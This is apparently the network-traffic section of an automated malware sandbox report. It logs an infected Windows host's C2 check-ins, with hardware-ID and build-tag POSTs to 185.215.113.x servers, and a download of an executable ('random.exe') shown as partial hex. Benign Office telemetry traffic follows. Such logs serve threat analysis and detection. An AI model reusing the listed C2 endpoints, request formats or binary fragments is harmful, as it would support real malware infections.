Dec 7, 2024 13:00:55.895507097 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 7, 2024 13:00:55.896321058 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 8>8>8>a#X##8>8>8>8>8>8>K~
Dec 7, 2024 13:00:55.896339893 CET	1236	IN	Data Raw: 39 7d 16 6d 2b 34 c2 cd ba c3 32 6b 04 40 26 e4 c2 38 3e 6a b4 bd fe 55 bd c3 8b bd 33 01 b3 e9 fe 88 3d f7 e1 c9 a1 e1 2e 24 c7 e1 ad 38 cb 26 b6 c3 0a ca 8b 38 3e e1 38 ff c9 ac 3b b5 0a ca 0f 13 40 e1 38 7d 0a 63 72 cc 3e e1 ad 20 f2 f6 ad 38 Data Ascii: 9}m+42k@&8>jU3=.$8&8>8;@8}cr> 8V=e8&8>l'\|8>K8q>q>&d8>n 8f28>S1S%SSSSxSpS<9z]`S)XSPSHS
Dec 7, 2024 13:00:55.896349907 CET	448	IN	Data Raw: 21 4b 94 38 ad 4d 72 72 11 38 c9 2e 9a 89 95 e0 c3 d4 ce 44 ae a0 da f8 f0 38 3d f7 59 c7 a1 e1 3a 6c 41 6e f4 39 26 f8 bd 38 3e 6c 86 c1 9b b1 33 13 b3 f9 32 37 b3 f5 04 8b 3d f7 e1 c9 a1 e1 15 d4 55 24 ae 8b 3d f7 49 c8 a1 e1 b0 ad 4e 6e f4 39 Data Ascii: !K8Mrr8.D8=Y:lAn9&8>l327=U$=INn9&8>lV30F!K4Mrr8&D8=Y:tDn9&8>l4VVlD8D3NM6k+"D"@8Mrr8NH>8}H>8}
Dec 7, 2024 13:00:55.897084951 CET	1236	IN	Data Raw: 3f 9b 3e 49 4a 4f 81 e1 00 37 54 7d 3e 9b 3e 6c 03 64 cb 5d e0 39 c9 a8 96 9c 4c e1 ad c3 2e 67 a4 ac 5b 66 89 ac 57 64 2b 5c 3e 55 c1 8b 94 e0 c3 6c cf 44 ae c3 83 05 fe 8e 3d f7 49 c8 a1 e1 38 7d f6 66 6e ac 43 c9 d3 47 3e e1 38 ff 26 10 bc 38 Data Ascii: ?>IJO7T}>>ld]9L.g[fWd+\>UlD=I8}fnCG>8&8>l372.=8&8>lq :8&~ 28&Z *8&F "8nj5>=8(VV<#GLEG8v5>7T>>fnG8>IZO:&7D1Fk4b,$8
Dec 7, 2024 13:00:55.897098064 CET	1236	IN	Data Raw: a2 07 81 e1 ad ad 34 6f f5 39 26 80 b7 38 3e 6a f3 14 c4 a1 22 44 a6 d5 7d 7a 3e 31 ad 4d 72 72 11 38 df d1 37 9b 3e 31 37 7d 36 e1 c3 e4 cd 44 ae c5 72 e8 3a 7e 3f c9 1f 41 3e e1 38 10 c8 7e e6 37 3e e1 33 13 b3 ff 38 7d 1a 67 6e ac 55 6c 2b 30 Data Ascii: 4o9&8>j"D}z>1Mrr87>17}6Dr:~?A>8~7>38}gnUl+0"H4Mrr84Mq8}{>Dz:?A>8(VZ4VVlD8D/' B839}fnWd+P>UlD=IU$7T=>n>( 83.2=
Dec 7, 2024 13:00:56.015490055 CET	1236	IN	Data Raw: 11 38 c9 26 9a 20 fe e6 ad 38 c9 a8 96 f0 43 e1 ad 6b fe c9 5f 3d 3e e1 e0 f8 26 8c b3 38 3e 6c f3 40 26 84 b3 38 3e 6c f3 50 26 7c b3 38 3e 6c f3 5c 26 74 b3 38 3e 6c 33 e8 3e e1 ad 20 c6 e6 ad 38 c9 26 2a 20 be e6 ad 38 c9 26 1e 20 b6 e6 ad 38 Data Ascii: 8& 8Ck_=>&8>l@&8>lP&\|8>l\&t8>l3> 8&* 8& 8& 8& 8& 8& 8& 8?#?qzzk8q8Q*j8>nTd.0$Kl V828BfwF27T?>l(:k@~;>6?"G/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49987	185.215.113.43	80	6952	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 13:01:06.711436033 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 32 39 34 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1012943001&unit=246122658369
Dec 7, 2024 13:01:08.057063103 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 07 Dec 2024 12:01:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49991	185.215.113.206	80	6060	C:\Users\user\AppData\Local\Temp\1012943001\0fb4fa91ba.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 13:01:07.744530916 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 7, 2024 13:01:09.085326910 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:01:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 7, 2024 13:01:09.088969946 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHDBGHCBAEGCBFHJEBFI Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 48 44 42 47 48 43 42 41 45 47 43 42 46 48 4a 45 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 30 36 35 42 36 39 35 33 33 32 33 36 35 33 31 34 33 38 39 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 42 47 48 43 42 41 45 47 43 42 46 48 4a 45 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 42 47 48 43 42 41 45 47 43 42 46 48 4a 45 42 46 49 2d 2d 0d 0a Data Ascii: ------DHDBGHCBAEGCBFHJEBFIContent-Disposition: form-data; name="hwid"AF065B6953323653143898------DHDBGHCBAEGCBFHJEBFIContent-Disposition: form-data; name="build"drum------DHDBGHCBAEGCBFHJEBFI--
Dec 7, 2024 13:01:09.533829927 CET	210	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 12:01:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49994	185.215.113.16	80	6952	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 13:01:08.182444096 CET	55	OUT	GET /well/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 7, 2024 13:01:09.512367010 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 07 Dec 2024 12:01:09 GMT Content-Type: application/octet-stream Content-Length: 973312 Last-Modified: Sat, 07 Dec 2024 11:45:13 GMT Connection: keep-alive ETag: "67543549-eda00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 41 35 54 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 2a 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED] Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@n~{{{z{RichPELA5Tg"w@0u@@@d\|@Lou4@.text `.rdata@@.datalpH@.rsrcLo@p@@.relocuvd@B
Dec 7, 2024 13:01:09.512459040 CET	124	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQ
Dec 7, 2024 13:01:09.513492107 CET	1236	IN	Data Raw: e8 a9 00 00 00 68 02 24 44 00 e8 4f f0 01 00 59 c3 a1 30 14 4d 00 51 8b 40 04 05 30 14 4d 00 50 e8 e3 23 00 00 68 17 24 44 00 e8 2f f0 01 00 59 c3 e8 de 25 00 00 68 1c 24 44 00 e8 1e f0 01 00 59 c3 e8 ae e7 01 00 68 21 24 44 00 e8 0d f0 01 00 59 Data Ascii: h$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY%Mh?$DYVNNj(VYY^U80MtI3M0IMMVQfMo0M@0M\
Dec 7, 2024 13:01:09.513695002 CET	1236	IN	Data Raw: 8b 4f c4 85 c9 0f 85 e3 01 00 00 8d 4f a4 89 5f cc e8 60 83 00 00 8d 8f 80 fe ff ff e8 0a 04 00 00 8d b7 64 fe ff ff 8b ce c7 06 3c c9 49 00 e8 88 02 00 00 ff 76 04 e8 bf e8 01 00 59 8d 8f 8c fd ff ff e8 1b 02 00 00 8d 8f 7c fd ff ff e8 23 83 00 Data Ascii: OO_`d<IvY\|#l)\DItvL@IY9TPTX<@IY9D@D.,@IY9404
Dec 7, 2024 13:01:09.513704062 CET	248	IN	Data Raw: 00 8b ce e8 ab b5 00 00 6a 40 56 e8 d0 e3 01 00 59 59 8b c6 5e c2 04 00 55 8b ec 53 8b d9 56 57 80 7b 0d 00 8b 7b 08 75 29 8b 45 08 8b cf 8b 30 e8 7e b5 00 00 89 37 c7 47 0c 01 00 00 00 8b 43 08 80 7b 0d 00 5f 5e 5b 75 0d c6 40 10 00 5d c2 08 00 Data Ascii: j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_]
Dec 7, 2024 13:01:09.514467001 CET	1236	IN	Data Raw: 8b 75 08 57 8b f9 56 83 67 08 00 e8 eb e5 00 00 8a 46 10 8d 4f 20 88 47 10 8b 46 14 89 47 14 8a 46 18 88 47 18 8d 46 20 83 61 08 00 50 e8 c9 e5 00 00 8a 46 30 88 47 30 8b c7 5f 5e 5d c2 04 00 33 d2 33 c0 89 11 40 89 41 0c 89 51 08 88 51 10 89 51 Data Ascii: uWVgFO GFGFGF aPF0G0_^]33@AQQQQA,Q Q(Q0V&NW LjE$\|I IF^jAZ @uSV5I3WjXSG
Dec 7, 2024 13:01:09.514683008 CET	1236	IN	Data Raw: 00 8b 41 0c 83 e8 01 74 29 83 e8 01 0f 84 d4 07 04 00 83 e8 01 0f 84 bb 07 04 00 83 e8 01 74 19 83 e8 03 74 0d 48 83 e8 01 0f 85 97 07 04 00 8a 01 c3 83 39 00 0f 95 c0 c3 8b 41 08 83 78 04 00 eb f3 55 8b ec 53 56 8b 75 08 33 db 57 8a d3 8b 0e 8d Data Ascii: At)ttH9AxUSVu3WyQ>t(M@f9Xu8!tt_^3[]U3BSVWPPUUJ(MO1f~u6 t+u+3+fy4
Dec 7, 2024 13:01:09.514693975 CET	248	IN	Data Raw: 7f 05 04 00 3b fb 0f 84 26 fe ff ff e9 72 05 04 00 83 38 05 0f 85 d0 fe ff ff ff 45 f4 8d 45 ec 89 7d ec 8d 8d 54 ff ff ff 50 47 e8 5a 03 00 00 8b 45 d8 8b 48 04 8b 85 58 ff ff ff 89 45 bc e9 a6 fe ff ff 83 e8 21 0f 85 23 01 00 00 8b 41 04 6a 7f Data Ascii: ;&r8EE}TPGZEHXE!#AjYf9HmME@E0u]uEuuSPuWAjYf9HEHOTE]ETpXEE
Dec 7, 2024 13:01:09.515791893 CET	1236	IN	Data Raw: 00 3b fb 0f 84 31 fd ff ff e9 85 04 04 00 ff 75 e8 ff 75 f4 ff 75 e4 ff 75 e0 53 52 ff 75 f0 33 db 53 e8 86 03 00 00 85 c0 78 02 8b f3 8d 4d 84 e8 1a 02 00 00 8d 8d 78 ff ff ff e8 0f 02 00 00 8d 8d 6c ff ff ff e8 04 02 00 00 8d 8d 60 ff ff ff e8 Data Ascii: ;1uuuuSRu3SxMxl`MTM_^[rU]AjYf9H}AjYf9HEE}xPG\|EIE
Dec 7, 2024 13:01:09.515985966 CET	1236	IN	Data Raw: 00 88 5c 24 19 88 5c 24 1a ff 15 28 c3 49 00 8d 44 24 13 50 ff 75 08 e8 c2 03 00 00 ff 15 18 c2 49 00 85 c0 0f 85 aa 00 04 00 a1 00 14 4d 00 85 c0 0f 84 b5 00 04 00 33 ff be 90 23 4d 00 47 3b c7 0f 84 b1 00 04 00 8d 44 24 11 50 51 68 00 14 4d 00 Data Ascii: \$\$(ID$PuIM3#MG;D$PQhMhM,#MM#MD$D$P$<Ph5MhIt$MY@\$5MhMa\|$sY4=MMuW0M
Dec 7, 2024 13:01:09.632133961 CET	1236	IN	Data Raw: 4d e0 e8 6c a0 00 00 8b 75 ac 8d 4d f0 e8 22 7a 00 00 8d 45 f0 50 8d 4d 90 e8 39 01 00 00 8b 7d f0 57 68 58 ca 49 00 e8 cf 1a 02 00 59 59 85 c0 0f 84 8b fd 03 00 57 68 30 ca 49 00 e8 ba 1a 02 00 59 59 85 c0 0f 84 92 fd 03 00 57 68 08 ca 49 00 e8 Data Ascii: MluM"zEPM9}WhXIYYWh0IYYWhIYYWhIYYu>M8]uMEPMEMPxEPM9MM3NQjWJ:u3]@ESPEPW@

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.7	49702	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 11:59:15 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 11:59:16 UTC	471	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 11:59:15 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Thu, 05 Dec 2024 15:18:57 GMT ETag: "0x8DD1540234F33E7" x-ms-request-id: 1f1786e0-601e-0050-7103-482c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T115915Z-r1cf579d7789trgthC1EWRkkfc00000002z0000000002a5v x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 11:59:16 UTC	15913	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-12-07 11:59:16 UTC	16384	IN	Data Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
2024-12-07 11:59:16 UTC	16384	IN	Data Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
2024-12-07 11:59:16 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
2024-12-07 11:59:16 UTC	16384	IN	Data Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20 Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
2024-12-07 11:59:16 UTC	16384	IN	Data Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
2024-12-07 11:59:16 UTC	16384	IN	Data Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
2024-12-07 11:59:16 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
